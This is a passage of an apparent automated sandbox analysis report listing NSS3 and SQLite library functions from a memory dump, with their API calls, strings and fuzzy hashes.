                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dd8b16757146c2e012579e9a4c98325792c97e4cb908736411145253bdf1af3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7571FFB5E04201CFDB00CFA6CC80EAAB7B5BF58318F14862CE90997B15E771D946CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C4C1F19
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C4C2166
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C4C228F
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C4C23B8
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4C241C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$Error
                                                                                                                                                                                                                          • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                                          • API String ID: 3204416626-1906384322
                                                                                                                                                                                                                          • Opcode ID: 279f69142dcc704d427feda416484e0c18e29ef950b20e5698c8df1d4e8f70b3
                                                                                                                                                                                                                          • Instruction ID: 659b0a025c6e2e616514a7169c98a9ec15efc2ab9a3bda8b3a13508204cb1fea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 279f69142dcc704d427feda416484e0c18e29ef950b20e5698c8df1d4e8f70b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 100230AAF0C7C86EF731C271C44CFC76AE09B45329F18266EC59E46793CBE859498352
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                            • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C40103E
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C401139
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C401190
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C401227
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C40126E
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C40127F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                                                                                                                                                          • String ID: PXl$delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                                                                                                                          • API String ID: 2733752649-599401849
                                                                                                                                                                                                                          • Opcode ID: c412f2177311994f0d3dd46c194a51709b64330d0e44857f393b415bd7a45882
                                                                                                                                                                                                                          • Instruction ID: fcc294771b3d1a573e1846f118ab1fe3be98fb48d25d47074b38ea2367236cd4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c412f2177311994f0d3dd46c194a51709b64330d0e44857f393b415bd7a45882
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A713A317457019BEB08DF64DC85E6A33B6FB8A329F15423DE8119BB80DB70E941C79A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C3F
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C60
                                                                                                                                                                                                                          • PR_ExplodeTime.NSS3(00000000,6C471C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C94
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                          • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                          • API String ID: 3534712800-180463219
                                                                                                                                                                                                                          • Opcode ID: fede46b7e1200139fbb2179b3e8ed4e53b59ab7bab863943c133c24c37272fe5
                                                                                                                                                                                                                          • Instruction ID: 7566b953fb5134e0efe5ffc407b7f3cddde754fe5fdc9017ec793f21faddc40b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fede46b7e1200139fbb2179b3e8ed4e53b59ab7bab863943c133c24c37272fe5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D514C76B016494FC708CDADDC52BEAB7DA9BE4310F48C23AE842DB785D638E906C751
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C541027
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5410B2
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C541353
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: memcpy$strlen
• String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
• API String ID: 2619041689-2155869073
• Opcode ID: 9a21f5e22d29aa833ae8d57df20ee8051a500afd690f39b3d04bf3bb215b9c46
• Instruction ID: b706ec1af18f49776b24574a5296b55c8148aa7b2aedd4cdbb35940271324d8e
• Opcode Fuzzy Hash: 9a21f5e22d29aa833ae8d57df20ee8051a500afd690f39b3d04bf3bb215b9c46
• Instruction Fuzzy Hash: F2E1AF75A08380DFD714CF25C880A6BBBF1AFC6348F14892DE98987B51E771E855CB82
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C548FEE
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5490DC
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C549118
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C54915C
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5491C2
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C549209
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: 3333$UUUU
• API String ID: 1967222509-2679824526
• Opcode ID: b28e4f32eba8fc58c79816c637ad2ddf0a0ca6bf65baf65cb1fd386395a79438
• Instruction ID: f6b5ddcf814d9d77b1de30727796fc655a8d2700ead46186cd8eea8324e8ba86
• Opcode Fuzzy Hash: b28e4f32eba8fc58c79816c637ad2ddf0a0ca6bf65baf65cb1fd386395a79438
• Instruction Fuzzy Hash: C5A1A272E001159BDB04CB68CD81BAEB7B9BF88324F0A8129D919B7741E736EC41CBD1
APIs
• NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C4DBD48
• NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C4DBD68
• NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C4DBD83
• NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C4DBD9E
• NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C4DBDB9
• NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C4DBDD0
• NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C4DBDEA
• NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C4DBE04
• NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C4DBE1E
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: AlgorithmPolicy
• String ID:
• API String ID: 2721248240-0
• Opcode ID: 723a4102b598834bc975c251d82f1556583ca59352abc1975d098b217f30361d
• Instruction ID: 903f240ee7ad57ad7270bb0d851cf4e57ecc02f6b71cad16f2afa42c86911af2
• Opcode Fuzzy Hash: 723a4102b598834bc975c251d82f1556583ca59352abc1975d098b217f30361d
• Instruction Fuzzy Hash: 8E219376E0439A57FF00EA579C63F8F32749B9274FF0A0158E91AAF741E710B41886E6
APIs
• PR_CallOnce.NSS3(6C5D14E4,6C53CC70), ref: 6C588D47
• PR_GetCurrentThread.NSS3 ref: 6C588D98
  • Part of subcall function 6C460F00: PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
  • Part of subcall function 6C460F00: PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
• PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C588E7B
• htons.WSOCK32(?), ref: 6C588EDB
• PR_GetCurrentThread.NSS3 ref: 6C588F99
• PR_GetCurrentThread.NSS3 ref: 6C58910A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
• String ID: %u.%u.%u.%u
• API String ID: 1845059423-1542503432
• Opcode ID: 83dd3624b8c341a02775f9efacd2464bfc654c1991f4bb963fe33b5b24379e6c
• Instruction ID: eb8c0580ef87859266ca774d845ad184403f38d12f5aacbe7b3772044d59c109
• Opcode Fuzzy Hash: 83dd3624b8c341a02775f9efacd2464bfc654c1991f4bb963fe33b5b24379e6c
• Instruction Fuzzy Hash: BA027A3190B2718FDB18CF19CC6876ABBB3EF82304F19825AD8915FA91C731E949C791
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
• API String ID: 3168844106-1126224928
• Opcode ID: d94b5641098191c70452d2b0a407c6182c02a7fdc09034f707d0e23a4b0198b2
• Instruction ID: 9dfea458652964e73a28854e03e335769df228a911e7d2507d7915e929b9aedd
• Opcode Fuzzy Hash: d94b5641098191c70452d2b0a407c6182c02a7fdc09034f707d0e23a4b0198b2
• Instruction Fuzzy Hash: A3729D70E452058FEB14CF69C480FAABBF1BF49308F1881BDD8159BB52D776A846CB94
APIs
• memcmp.VCRUNTIME140(?,00000000,6C3FC52B), ref: 6C529D53
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52A035
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52A114
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log$memcmp
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 717804543-598938438
APIs
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C408637,?,?), ref: 6C549E88
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C408637), ref: 6C549ED6
Strings
• database corruption, xrefs: 6C549ECA
• 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C549EC0
• %s at line %d of [%.10s], xrefs: 6C549ECF
Similarity
• API ID: _byteswap_ulongsqlite3_log
• String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
• API String ID: 912837312-598938438
APIs
• memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5581BC
Strings
Similarity
• API ID: memset
• String ID: BINARY$out of memory
• API String ID: 2221118986-3971123528
APIs
• PORT_ArenaMark_Util.NSS3(?), ref: 6C4D9ED6
  • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
  • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
  • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
• PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C4D9EE4
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4D9F38
  • Part of subcall function 6C4DD030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C4D9F0B), ref: 6C4DD03B
  • Part of subcall function 6C4DD030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C4DD04E
  • Part of subcall function 6C4DD030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C4DD07B
  • Part of subcall function 6C4DD030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C4DD08E
  • Part of subcall function 6C4DD030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4DD09D
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4D9F49
• SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C4D9F59
  • Part of subcall function 6C4D9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C4D9C5B), ref: 6C4D9D82
  • Part of subcall function 6C4D9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C4D9C5B), ref: 6C4D9DA9
  • Part of subcall function 6C4D9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C4D9C5B), ref: 6C4D9DCE
  • Part of subcall function 6C4D9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C4D9C5B), ref: 6C4D9E43
Similarity
• API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
• String ID:
• API String ID: 4287675220-0
APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C58D086
• PR_Malloc.NSS3(00000001), ref: 6C58D0B9
• PR_Free.NSS3(?), ref: 6C58D138
Strings
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: FreeMallocstrlen
• String ID: >
• API String ID: 1782319670-325317158
Strings
Similarity
• API ID:
• String ID: 0Xl$PXl$pXl$winUnlock$winUnlockReadLock
• API String ID: 0-3763817051
APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C3F5001,?,00000003,00000000), ref: 6C51DFD7
• memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6C3F5001,?), ref: 6C51E2B7
• memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6C3F5001,?), ref: 6C51E2DA
Strings
Similarity
• API ID: memcpymemsetstrlen
• String ID: W
• API String ID: 160209724-655174618
APIs
• memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C4E1052
• memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C4E1086
Strings
Similarity
• API ID: memcpymemset
• String ID: h(Nl$h(Nl
• API String ID: 1297977491-2521858428
Strings
Similarity
• API ID:
• String ID: 0Xl$PXl$pXl$winUnlockReadLock
• API String ID: 0-3226063409
                                                                                                                                                                                                                          • Opcode ID: af054575a39848dd6bf195747020576d13d322c737637f3ae840f671339e2b7a
                                                                                                                                                                                                                          • Instruction ID: f843182687a204203666e95003b2513f3c936c0f0dacbd241997615a7e5ab72f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af054575a39848dd6bf195747020576d13d322c737637f3ae840f671339e2b7a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25E13F70A187408FDB04DF28D885A5ABBF0FF89314F12962DE89997351E770A985CF86
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
                                                                                                                                                                                                                          • API String ID: 0-3485574213
                                                                                                                                                                                                                          • Opcode ID: af372d97726ed1e5e114c16b70f6d8757a8c998c6574d7665910bb1088b05304
                                                                                                                                                                                                                          • Instruction ID: 844af440bcfc91da027a34ac96f9f379025b6a92f189cc433d7a0c2dd5d9b45b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af372d97726ed1e5e114c16b70f6d8757a8c998c6574d7665910bb1088b05304
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A716772F882114BEB14CB28C880F9A73A29B85314F294278CD59AFBD2D6719C4787D2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: sqlite_$sqlite_master$sqlite_temp_master
                                                                                                                                                                                                                          • API String ID: 0-4221611869
